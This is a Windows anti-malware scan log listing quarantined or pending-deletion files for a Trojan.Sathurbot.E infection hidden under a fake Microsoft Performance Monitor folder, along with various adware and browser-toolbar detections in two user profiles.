Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e112b9581d3d5ba2651112319eb4672d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e1d3d7b0d3d53ad7a58fc9ae1a7d7fb9, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e2d766817600073df74c0cf6b0b61496, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e78ef53bd32609839d2737d2ecc0cf01, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e99153e73fac59432bc922fff075bc0f, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e9f653c8aa546072140276f9706f7792, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\eb44cb5d0f487dc8aab2f8d517ff7536, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5d8a4e35087c99336bdd7ac68d24e6d0, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5e1b9e8970a28f28e6a2991c1a12a3e2, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\60e5bb6744a7342441c49a380d3eed3b, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\63cbf76f3e3cf9d4a2df1e524d6b21ec, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\64a5e5ce5691ea61f806e4f0816da6a8, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\65b917aee136d34b3beecc082ae85412, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\PROGRAMDATA\Microsoft\Performance\Monitor, Removal Failed, [2851], [355073],1.0.1064
PUP.Optional.OpenCandy, C:\Users\Lac\AppData\Roaming\OpenCandy\138AEBC68F954148996D9E789C14C56E, Quarantined, [646], [173202],1.0.1064
PUP.Optional.OpenCandy, C:\Users\Lac\AppData\Roaming\OpenCandy\634914D41B93453E93664C7922DF3EE3, Quarantined, [646], [173202],1.0.1064
PUP.Optional.OpenCandy, C:\Users\Lac\AppData\Roaming\OpenCandy\6E2F275651E84F428E6E81210C9C30B4, Quarantined, [646], [173202],1.0.1064
PUP.Optional.OpenCandy, C:\Users\Lac\AppData\Roaming\OpenCandy\A25C1BF3C19C4D72826652B23BB266D0, Quarantined, [646], [173202],1.0.1064
PUP.Optional.OpenCandy, C:\USERS\LAC\APPDATA\ROAMING\OpenCandy, Quarantined, [646], [173202],1.0.1064
PUP.Optional.SupraSavings, C:\Program Files\SupraSavings\SSL, Quarantined, [11847], [179895],1.0.1064
PUP.Optional.SupraSavings, C:\PROGRAM FILES\SupraSavings, Quarantined, [11847], [179895],1.0.1064
PUP.Optional.BlockAndSurf, C:\PROGRAM FILES (X86)\-BlockAndSurf-soft, Quarantined, [12575], [175680],1.0.1064
PUP.Optional.FFToolbar, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\fftoolbar2014@etech.com\chrome\content, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.FFToolbar, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\fftoolbar2014@etech.com\chrome\skin, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.FFToolbar, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\fftoolbar2014@etech.com\chrome, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.FFToolbar, C:\USERS\LAC\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\BWYNG1S2.DEFAULT\EXTENSIONS\fftoolbar2014@etech.com, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.SearchEngine, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\searchengine@gmail.com\chrome\content, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.SearchEngine, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\searchengine@gmail.com\chrome\skin, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.SearchEngine, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\searchengine@gmail.com\chrome, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.SearchEngine, C:\USERS\LAC\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\BWYNG1S2.DEFAULT\EXTENSIONS\SEARCHENGINE@GMAIL.COM, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\_metadata, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\USERS\LAC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\FPMEEMBNAGMAGPPKGGHHFJFDFAJDFCAH, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\_metadata, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\USERS\MIRNA\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\FPMEEMBNAGMAGPPKGGHHFJFDFAJDFCAH, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Amazon1Button.AppFlsh, C:\PROGRAM FILES (X86)\AMAZON\AMAZON1BUTTONAPP, Quarantined, [1755], [333344],1.0.1064
 
File: 1329
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\ProblemFinder\RegistryScan.xml, Delete-on-Reboot, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\ProblemFinder\ScanReport.xml, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\ProblemFinder\SystemScan.xml, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\CrashReportSender.llog, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\OneClickFixService.exe0.llog, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\PCKeeper.exe0.llog, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\PCKeeper.llog, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\PCKeeperService.exe0.llog, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\PCKeeperService.exe1.llog, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\PCKeeperService.exe2.llog, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\PCKeeperService.llog, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\RegistryCleanerComponent.dll0.llog, Quarantined, [1060], [178837],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\02b08cc11c5281e6d56d75c3e5ec6f6f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\046134dc081d4e4bd60228d94b4a07ad, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\06a0c344dcc4ebb5d62009a224e61685, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\06acf43cdbcc688223b6bd2ac8dda023, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\0a0c265a8fe0019c50ef44989aad9f4c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\0a3b52a14ec94499246e603d7c967daf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\0be17d8f6bd1655f15541dd32c994fd8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\0c562f6570fa8511b5aff91dae1df22f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\0eeef81f31c54974191c3180e7c559b8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\0f9a9a82cbd1c7ca7783d2700bdbd06b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\144aaba2a6a3a7024a71ade8f80dec76, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\14aafd8e07a9d2946637c94ef37d7480, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\169a3337025eed0ae46ef21ac9f029da, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\85524c5aa24a5a95e16b6e1c4cff571d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\8758a28d48ed0a7839dc483fbd6f7129, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\88f798ca90cbd3179f8c504a8fd6a1af, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\8a1156fd41d78cd113ac0549e754baa2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\8afb95ef0d1220d23b9623bffcb9ff57, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\8b609eedd6bb25c595cd09546420db93, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\8da3583b712916b4cac4f9f3f02fdaeb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\9090ad3a074b1da3fdf2b2aab969e097, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\915c0ea71bd2103634fb93120059f2d0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\920c265457f24c84dad5cc6f91f841e4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\941762a0c5862a72a0aa2c1995d754f8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\95c9e8535d09b813fef20e7d0a371b31, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\95e95d42d69637efd05a05d594525553, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\965c44f802aeda450496a2811908ddbb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\98aa80db2acbfe37a9f978c6b6c0920a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\9a1ed8766c859a2a21ff3cba26f0b166, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d031285af48b90962abac2afc48200b5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d04cb8eb0f0b9d030a0eae397e515d1a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d1a43a55c3bda34650bb9294a135abc2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d1eb47beb4f311fd481d357ab3456b07, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d2bed49e2a2d86016d8993a01ab552d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d2c89325d0d3f197b28dfd6d7b3c47dd, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d689be2c56c9bef8cd92cf62e665ba1a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d83514de16706316d5a5f1caef8d2b36, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\d8f7b2e0e75b2750819e98aeabdb125d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\daafc1ea4f1c3d7d6bcbbad50a4a8ea3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\dd4971dcc1fffa4e94555637edd79abf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\ddbecfa53bce79286cf9a44b4d6c6c90, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\548509c4cb148f0dc069d61e4191e2d9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\55608f6aefba4db7458a652a79a15c92, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\56b05055acf8caa94b019cad0d058ca3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\573376c678cdf8388e8ca569e6a3f42b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\577a157404a9c2bfa0ed3b91f432239c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\580b8e805f78816a32ad46a2d30c4501, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\5ad8fa78eabe15893d3376c8c500e258, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\5afc95652210998bd40844db7075e204, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\5d8a4e35087c99336bdd7ac68d24e6d0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\5e1b9e8970a28f28e6a2991c1a12a3e2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\60e5bb6744a7342441c49a380d3eed3b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\63cbf76f3e3cf9d4a2df1e524d6b21ec, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\64a5e5ce5691ea61f806e4f0816da6a8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\65b917aee136d34b3beecc082ae85412, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\661b0595c94df273a12dd98fdc0668d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\667cf4fefa31563c464ffd08433c8d97, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\22501a12640e0d2eacdf764df1625909, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\22c18af08e624e272bd4f1ae69f33d99, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\2393dd19a8c1e641f1a6d74c8d2683f1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\24487c94123c38ad51f71f3c5f17e6db, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\24956a069784f3ee4da71dc6b3b6709c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\2513dc81a92b9c05964b6fb577b29a92, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\25856f397a70bac6d97a0590bb1daf27, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\2589dfd756006a29a162ca3059761bd6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\26ba1fe505f5eb72eb8b08b07b9d2633, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\26def096d365a8ee4277c5319f81ab58, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\28d94aa8445f8afba3336edb1c27b14c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6dbdd2e5f83e8cca4603bb59843899d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6e994f8d30ada5c4aed6d24b44b537ca, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\74b666ebf6a455763d405af8b4d798a7, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\75fe5ecb00a0dcdcb2ebb33eeeafdb14, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\766ea216db4e132842f5f88dff5f4102, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\76aab28808169629449f7b5b28dd1832, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\77711852ea1271f21e48fd93d6b460ed, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7845b238fba0d738febc6b8d75a76b19, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\785926353aace0cc149794b21ccc8c18, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\79c0273e316f7a0dc2dd98323942d7f1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7bc7a84ed845669c6eed879826be7fbc, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7c416188c1a8b9f7a8ff4609a83e02b4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7cde92506819f51e710688643e7873e9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c14debd37305c8b9ee44aaba46212b4f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c1e5440a8ad280d66ce37cd683132035, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c2515841ede50ad5241889b3a5239af1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c2ca803de5ea15aebc24dfb31e46ff88, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c3334816313242fc3a4fcc7650a14d9d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c35c62bbfd5815621772ca046abafe5e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c3b439f57d05edb948574b50b8fa59fb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c3b69c6a946666dd8ca776ad800ff836, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c4fcb2f1b6686cd04f82bcf02314f6ae, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\ece31a64f1410072be86549af78ad112, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\ed39a6eb8cb42d567573ebdb6ca27c61, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\f132b912ea3f8097762b256293a9953a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\f35e906c7e6c3b68f0285005195eec52, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\f751683de03ade9e0920b62cc8542e6e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\f7bcab5dace78283b9f759005152de8d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\f86dbdd379fae926a612a144d5ecce69, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\f97beeb0ed48210ef8858bff00bb7d18, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\3c1422ca03ba9542755cb7e8fd271330, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\3c9e79246325a3d103cd13657e07eb39, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\3cd8f1ad7174b0259114330ea573eb2c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\3fd3c85733e1d00b4a694b5d187b6474, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\423156f65de615cf4d01c2c42eb03db1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\437b623652da5458a6c67b00c53868f5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\44c20a4c35790e24de6161561fdbb077, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\4678b4edab6ca6b6701cf31cf9568704, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\46d4977b73223dab65141204322efc51, Quarantined, [2851], [355073],1.0.1064
